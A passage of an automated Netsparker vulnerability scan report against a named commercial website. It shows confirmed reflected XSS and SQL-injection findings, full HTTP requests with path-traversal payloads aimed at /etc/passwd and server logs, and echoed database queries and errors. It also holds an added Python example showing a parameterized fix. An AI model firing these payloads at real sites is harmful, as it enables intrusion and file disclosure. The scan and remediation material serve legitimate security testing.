OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=38n5v6ll5kg3ehm3q3m7oecek1; path=/
Content-Length: 3263
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 
lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc='"--></style></script><script>netsparker(0x0005FA)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005FA)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/parl00/project.php

/ppc/leadflow/parl00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/project.php?catId=10002&iusrc='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
catId GET 10002
iusrc GET '"--></style></script><script>alert(0x0005FB)</script>

Request

GET /ppc/leadflow/parl00/project.php?catId=10002&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005FB)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=4uspumaqtv5d95uposjnv31d30; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 
lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='"--></style></script><script>netsparker(0x0005FB)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005FB)</script>/' union select prj.catI' at line 5
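Each of the four confirmed entries above has the same root cause: the lookup splices the request URI into `where prj.project_page_url = '...'` as text, and on failure the page returns the query and the database error in the HTML. The following is an added example that models that pattern and its fix; it is written in Python against an in-memory sqlite3 table rather than the site's PHP/MySQL code, and the table layout, the row values, and the function names `make_db`, `lookup_concat` and `lookup_param` are assumptions made for the example. `lookup_concat` reproduces the failure shown on the page (the probe breaks the string literal and the error, query included, comes back in the body); `lookup_param` binds the URI as a parameter, so the probe is simply a value that matches nothing, returns a generic message on database errors, and HTML-escapes anything it reflects.

```python
import html
import sqlite3

# Constructed stand-in for the site's project lookup (not the site's code).
PROBE = "'\"--></style></script><script>netsparker(0x0005FB)</script>"
GOOD_URI = "leadflow/parl00/project.php?catId=10002&iusrc=iupsc"
BAD_URI = "leadflow/parl00/project.php?catId=10002&iusrc=" + PROBE


def make_db():
    """One table with the columns the echoed query selects; values are made up."""
    db = sqlite3.connect(":memory:")
    db.execute("create table lead_flow_one_pages_details "
               "(catId integer, groupId integer, templateId integer, project_page_url text)")
    db.execute("insert into lead_flow_one_pages_details values (10002, 1, 3, ?)", (GOOD_URI,))
    return db


def lookup_concat(db, request_uri):
    """Vulnerable: string-built query; on error the SQL and the DB message are echoed."""
    sql = ("select catId, groupId, templateId from lead_flow_one_pages_details "
           "where project_page_url = '" + request_uri + "'")
    try:
        return {"rows": db.execute(sql).fetchall(), "body": ""}
    except sqlite3.Error as e:
        # the behaviour recorded on the page: 200 OK, query plus error, unescaped
        return {"rows": [], "body": sql + str(e)}


def lookup_param(db, request_uri):
    """Hardened: bound parameter, generic error, any reflection HTML-escaped."""
    sql = ("select catId, groupId, templateId from lead_flow_one_pages_details "
           "where project_page_url = ?")
    try:
        rows = db.execute(sql, (request_uri,)).fetchall()
    except sqlite3.Error:
        # log the detail server-side; never return it to the client
        return {"rows": [], "body": "Internal error"}
    if not rows:
        return {"rows": [], "body": "No project for " + html.escape(request_uri, quote=True)}
    return {"rows": rows, "body": ""}
```

With the probe URI, `lookup_concat` hits an unterminated-quote tokenizer error and returns a body containing a live `<script>` tag, while `lookup_param` returns no rows and a body in which the probe appears only as `&lt;script&gt;`.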
- /ppc/leadflow/dima00/

/ppc/leadflow/dima00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/dima00/?'"--></style></script><script>alert(0x0005F9)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005F9)</script>

Request

GET /ppc/leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=iqnt5pp8ti3qkdvuvm4p7j9ur4; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>' OR prj.project_page_url = 'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>' OR prj.project_page_url = 'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>' OR prj.project_page_url = 'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>' OR prj.project_page_url = 'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>' OR prj.project_page_url = 'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005F9)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/dima00/project.php

/ppc/leadflow/dima00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='%22--%3E%3C/..

Parameters

Parameter Type Value
catId GET 80006
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x0005FC)</script>

Request

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005FC)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:31:04 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9dkclbb1jbff0csgfmd04jm7c5; path=/
Content-Length: 3383
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join 
sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005FC)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/dima00/project.php

/ppc/leadflow/dima00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/dima00/project.php?'"--></style></script><script>alert(0x000601..

Parameters

Parameter Type Value
catId GET 80006
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x000601)</script>

Request

GET /ppc/leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:31:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=b5f6bd9c7gj6ognod8040oq7b6; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId 
where prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000601)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/dima00/project.php

/ppc/leadflow/dima00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc%00%27%22--%3E%3C%2Fs..

Parameters

Parameter Type Value
catId GET 80006
iusrc GET iupsc'"--></style></script><script>alert(0x000605)</script>

Request

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000605)%3C%2Fscript%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:31:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
